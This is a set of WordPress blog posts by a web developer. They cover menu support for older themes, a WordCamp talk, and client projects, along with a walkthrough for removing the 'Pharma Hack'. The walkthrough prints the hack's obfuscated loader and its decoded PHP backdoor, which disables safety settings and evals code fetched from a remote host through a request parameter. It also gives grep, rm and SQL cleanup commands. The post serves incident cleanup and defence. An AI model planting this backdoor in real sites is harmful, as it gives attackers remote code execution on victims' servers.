WordPress Menu Support for Older Themes

As a lot of you that are die-hard WordPress users are probably already aware, WordPress has launched their new menu builders under the appearance tab. The menu builder will allow you to create a menu from any categories, pages and links, order them by drag and drop, create submenus, etc.

This is something that I am pretty sure was contributed to core from the good people at WooThemes, because they had this for a while in some of their theme settings. In the event you have an older WordPress Theme and would like to have this functionality but inside the dashboard you keep getting a notice that your theme is not compatible, here’s what you can do…

Locate functions.php in your theme directory and add this code:

// This theme uses wp_nav_menu() in one location.
register_nav_menus( array(
	'primary' => 'Primary Navigation'
) );

Secondly, locate your theme directory/header.php file and add/edit this line of code:

<?php wp_nav_menu( 'sort_column=menu_order&container_class=menu-header' ); ?>

Once these two files have been modified, you should be able to log back into your WordPress dashboard, select the Menus option under Appearance, and get started.

EP:023 – The Cotton Club Podcast

This evening I had the opportunity to chat w/ Keith Crawford, Steven Trotter, and Christopher Spencer about this year's Wordcamp Fayetteville. During the show Chris, who is heading up the event, went over the 4 tracks for the event as well as touching on some of the content that would be covered this year. As a sidenote, I will be speaking during one of the sessions this year on WordPress profitability for agencies and freelancers, you can see my blog post about my discussion here…

If you haven’t registered for Wordcamp Fayetteville yet you had better get on the ball, I think there are 20+ spots available for the conference. To register online, click here…

My #WCFAY Presentation Slides

FYI, the formatting is not good in these slides for some reason…

Presentation Preview for #WCFay

I will be doing a presentation titled ‘Making WordPress Profitable for Agencies / Design Firms‘ during Wordcamp Fayetteville this year, which is taking place on July 30, 2011 in Fayetteville, at the Donald W. Reynolds Center for Enterprise Development. If you haven’t registered already, there is still time, the price for general admission is $35 and you can click here to register online.

The people in charge at #WCFay asked me to do a short blog post or teaser so that those attending the conference will have a heads up as to what my talk will be about. In short, it’s all about making money. I could just leave it at that and feel pretty confident that I have proposed a topic that will be of interest to everyone there, but I will take it a step further. This discussion is going to more or less look at our industry from a business owner's perspective and why I feel like WordPress is the most powerful tool we have in our arsenal today. I will also share some tips that can help your agency or firm become more profitable during a down economy…

I am looking forward to this discussion. Here’s a few teaser slides from my presentation…

This should be a fun presentation, hope to see you there!!

Current Projects: Rosewood Cremations

We completed a project for Rosewood Classic Coach a few months ago and they were so happy w/ the way the project turned out they asked us to take a look at their Rosewood Cremation website and convert it to WordPress for them. In addition they also wanted to add a small amount of e-commerce to the site as well as converting some of their forms to interactive PDFs. I haven’t completed the project yet but can share a screenshot. The entire project was built upon the Genesis framework in WordPress.

Current Projects: Detco, Inc.

I was recently contacted by long-time client, Detco Industries, Inc. about developing two small projects for them. Each of these micro websites will contain product information such as MSDS, TDS, and DTS (product label) information. In the future they also wanted the ability to post additional information about their products such as YouTube videos, etc. I elected to use WordPress w/ the Genesis Framework to develop each of these projects instead of building a custom database driven application and my development time wasn’t consumed w/ writing code. I absolutely love Genesis framework, both of these projects were designed using the Genesis Child Theme as the starting point. Since neither site is live right now I can’t post any links, but here are a few screengrabs…

 

 

Current Projects: Arkansas Adoption

This is a project that my wife and I are partnering with a local attorney, Shane Henry, to bring online that serves as a tool to recruit pregnant mothers that might be looking to either have an abortion or put their children up for adoption. Please be in prayer w/ Donna and I that we are able to locate a child through this effort…

This website will contain a lot of answers to frequently asked questions regarding adoption, adoption in Arkansas, and hopefully serve as a useful resource for its users. The website hasn’t launched yet but will hopefully have it ready to go live by the end of this month, in the meantime, here’s a screenshot of what the website will look like…

 

Removing WordPress Pharma Hack

I posted a few weeks ago about the WordPress Pharma Hack that has been running pretty rampant across the web, in case you missed my initial post, here’s a link. Well, I would like to say that we were able to jump right on this thing and immediately remove it pretty easily, but that simply wasn’t the case. I worked closely w/ Matt Critcher, our server admin at Pleth, LLC, and probably one of the sharpest guys I know, and we toiled over this thing daily for about a week or so until we finally eradicated it from all of our WordPress installations. For the benefit of all of you that are still wrestling w/ this hack, here’s exactly how we removed it…

Locate all base64_decode

This hack, like a lot of others, used base64 code to disguise JavaScript, so we have to locate it and remove it. This is what it will look like:

<?php $XZKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';$joEDdb
='b'.$XZKsyG.$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;@$ygDOEJ(@$j
oEDdb('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY.......and so on...

To locate and remove the code, you will need to SSH into your server, cd into the WordPress home directory and run the following:

grep -r 'php \$[a-zA-Z]*=.as.;' * |awk -F : '{print $1}' | xargs -I{} rm -v {}

This will scan the entire folder and all its sub-directories for any file containing the string “php $RANDOMLETTERS='as'” and delete it verbosely. If you do not wish to delete it automatically, just run this to print out the filename:

grep -r 'php \$[a-zA-Z]*=.as.;' * |awk -F : '{print $1}'

When we did this, there were about 50 files that contained the exploit. There are other files containing nasty code as well. You will also need to search for and remove files containing the string “wp_class_support”.

grep -r wp_class_support * |awk -F : '{print $1}' |xargs -I{} rm -v {}

This bit of syntax will search for files with that string and delete them (if you want to manually delete them, leave off the xargs part as per the above example).

I also found this nasty thing (not sure if it is related to the Pharma Hack) in several files. All were WordPress core files, so you MUST replace every WordPress file on your site with clean ones. DO NOT do this via the internal utility – use FTP, SCP, or whatever to get these files uploaded. Once you have done this, do

grep -r QGluaV9yZXN0b * |awk -F : '{print $1}'

This will search the remaining files for the exploit. Any files containing this MUST be replaced or you are still infected. The full text of the exploit is a base64-encoded string (it begins with the QGluaV9yZXN0b searched for above).

Which decodes as

@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{@ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);}else{@ini_alter('error_log',NULL); @ini_alter('log_errors',0);
@ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1);}
function GetShellContent($host,$url){if(@function_exists('curl_init'))
{$full_url='http://'.$host.'/'.$url;$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,$full_url);curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_HEADER,false);curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0');$data=@curl_exec($curl);
curl_close($curl);return $data;}elseif(@function_exists('fsockopen'))
{$fp=@fsockopen($host,80,$errno,$errstr,10);
if($fp){$out="GET /$url"." HTTP/1.0\r\n";$out .="Host: $host\r\n";
$out .="User-Agent: Mozilla/4.0\r\n";$out .="Connection: Close\r\n\r\n";
@fwrite($fp,$out);while($ans[]=fgets($fp));fclose($fp);$ans=trim(implode('',$ans));
$data=(trim(substr($ans,strpos($ans,"\r\n\r\n"))));
return $data;}}elseif(@function_exists('file_get_contents') && @ini_get('allow_url_fopen')==1)
{$full_url='http://'.$host.'/'.$url;$data=@file_get_contents($full_url);return $data;}}
if($_REQUEST['sh'] != "")
{eval(base64_decode(GetShellContent("\x73\x65\x6f\x74\x6f\x6f\x73\x2e\x63\x6f\x6d","s/i.php?"
.$_REQUEST['sh']."&host=".urlencode($_SERVER['SERVER_NAME'])."&url=".urlencode
($_SERVER['REQUEST_URI']))));exit;}

I went ahead and scanned the whole site for files that had base64_decodes in them. To search for these do the following:

grep -r base64 * |awk -F : '{print $1}' |sort |uniq

This will print out a list of each file that contains the string “base64”. You should examine each file carefully for rogue content, as many files legitimately contain this string and need it to function. If you are unsure of the code, replace the file with a fresh copy. Most of the files I’ve seen that are infected have the base64 statement at the very top of the file but this is not always the case.
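
A more cautious version of the three indicator scans above, as an added example that is not part of the original post: it starts at the directory itself so top-level dotfiles are included, copes with spaces in filenames, and moves matches into a quarantine folder instead of deleting them. The function names, variable names and the paths in the usage comment are assumptions.

```sh
# Added example, not code from the original post. Function names and the
# quarantine directory are assumptions; the three patterns are the ones the
# post searches for. Pass the site root without a trailing slash.
PAT_STUB='php \$[a-zA-Z]*=.as.;'   # obfuscated loader stub
PAT_CLASS='wp_class_support'
PAT_B64='QGluaV9yZXN0b'            # start of the base64 payload

# List every file under $1 that contains any indicator. Starting find at the
# directory itself (not at *) also covers dotfiles in the top-level folder,
# and -exec hands each path to grep intact, whatever characters it contains.
pharma_scan() {
  find "$1" -type f \
    -exec grep -q -e "$PAT_STUB" -e "$PAT_CLASS" -e "$PAT_B64" -- {} \; \
    -print
}

# Move matches from site root $1 into quarantine dir $2 (which must be
# outside $1), keeping relative paths, and print the number of files moved.
pharma_quarantine() {
  find "$1" -type f \
    -exec grep -q -e "$PAT_STUB" -e "$PAT_CLASS" -e "$PAT_B64" -- {} \; \
    -exec sh -c '
      rel=${3#"$1"/}
      mkdir -p "$2/$(dirname -- "$rel")" &&
        mv -- "$3" "$2/$rel" &&
        echo moved
    ' sh "$1" "$2" {} \; | wc -l | tr -d " "
}

# Usage (example paths):
#   pharma_scan /var/www/site
#   pharma_quarantine /var/www/site /root/quarantine
```

Quarantined core files should still be replaced with clean copies from a fresh WordPress download, not restored from the quarantine folder.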

Once you get the files cleaned, you need to work on the database. The exploit adds and/or modifies entries in the wp_options table. Using the MySQL interpreter or phpMyAdmin run the following query:

SELECT * FROM `wp_options` where `option_name` LIKE 'rss%' ORDER BY `wp_options`.`option_name` ASC;

This will search the wp_options table for all entries beginning with rss_ and return them. You will need to delete each one that looks similar to this:

rss_552afe0001e673901a9f2caebdd3141d

rss_ followed by strings of random numbers or letters is bad and MUST be deleted, as these entries are added by the exploit. The exploit also adds or modifies several other records in the same table. A couple of the sites we found recommended running these queries as well, since these options should not be set or contain any data:

delete from wp_options where option_name = "class_generic_support";
delete from wp_options where option_name = "widget_generic_support";
delete from wp_options where option_name = "fwp";
delete from wp_options where option_name = "wp_check_hash";
delete from wp_options where option_name = "ftp_credentials";

—————————————————————-

If all goes well, this information should help you eradicate the WordPress Pharma Hack from your WordPress installation. For a more detailed post on how to remove this hack, I highly recommend Matt Critcher’s post on his blog…

 

Current Projects: Gas & Mineral Rights

I am currently working w/ a client to develop a web resource that will allow property owners to sell their Gas and Mineral Rights to a group that is looking to invest. From a design standpoint, this is a very simple project and for the most part I have that part knocked out and we are just hammering out the details such as the contact forms and content. Since the website is not live I can’t share a link yet, but here’s a screenshot of what one of the pages on the site will look like. We hope to go live w/ the project in the next few weeks. The entire project is built on WordPress.

 

Securing wp-config.php

For the past week or so, our server admin, Matt Critcher, and I have been battling the “pharma-hack” in several WordPress installations, this website included. Long story short, we still haven’t been able to completely eradicate this exploit but I feel like we are getting a lot closer. This afternoon Matt advised that I go through some of our exploited sites and secure the wp-config.php files by adding security keys to them. There is even a generator on the WordPress.org website that you can use to generate these keys…

The process is simple, just generate a new set of security keys and place them inside your existing wp-config.php file. The generated keys will look something like this:

define('AUTH_KEY',         't`DK%X:>xy|e-Z(BXb/f(Ur`8#~Uz|');
define('SECURE_AUTH_KEY',  'D&ovlU#|CvJ##uNq}bel+^MFtT&.bj');
define('LOGGED_IN_KEY',    'MGKi8Br(&{H*~&0s;{fer[hOBk!ry^');
define('NONCE_KEY',        'FIsAsXJKL5ZlQo)iD-pt?aNwI|siOe');
define('AUTH_SALT',        '7T-!^i!0,w)L#JK@pcD;Vcy8,S)-&G');
define('SECURE_AUTH_SALT', 'I6`V|mDZq21-J|ihb u=|n#=]@]c #');
define('LOGGED_IN_SALT',   'w<$4c$Hmd%/*]`}qG(GaVDEsn,~*4i');
define('NONCE_SALT',       'a|#h{c5|P &xp]t=]V<`}.py(wTP%%');

What this will do is invalidate any existing cookies that might be out there. It’s obviously not the complete fix for the “pharma-hack” that I have been looking for but it only takes a second and could save you some potential heartache down the road from other exploits.
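
A quick check that a wp-config.php really has all eight keys and salts set, as an added example that is not part of the original post. The function and variable names are assumptions; the placeholder text it looks for is the one shipped in wp-config-sample.php.

```sh
# Added example, not code from the original post. Prints one line for every
# key or salt that is absent from the given wp-config.php or still set to
# the wp-config-sample.php placeholder. No output means all eight are set.
WP_KEY_NAMES='AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY
AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT'

wp_weak_keys() {
  config=$1
  for name in $WP_KEY_NAMES; do
    # Match define('NAME', ...) at the start of a line, so commented-out
    # defines are ignored; if a name is defined twice, check the last one.
    line=$(grep -E "^[[:space:]]*define\([[:space:]]*['\"]${name}['\"]" \
             "$config" | tail -n 1)
    case $line in
      '') echo "$name missing" ;;
      *'put your unique phrase here'*) echo "$name placeholder" ;;
    esac
  done
}

# Usage (example path): wp_weak_keys /var/www/site/wp-config.php
```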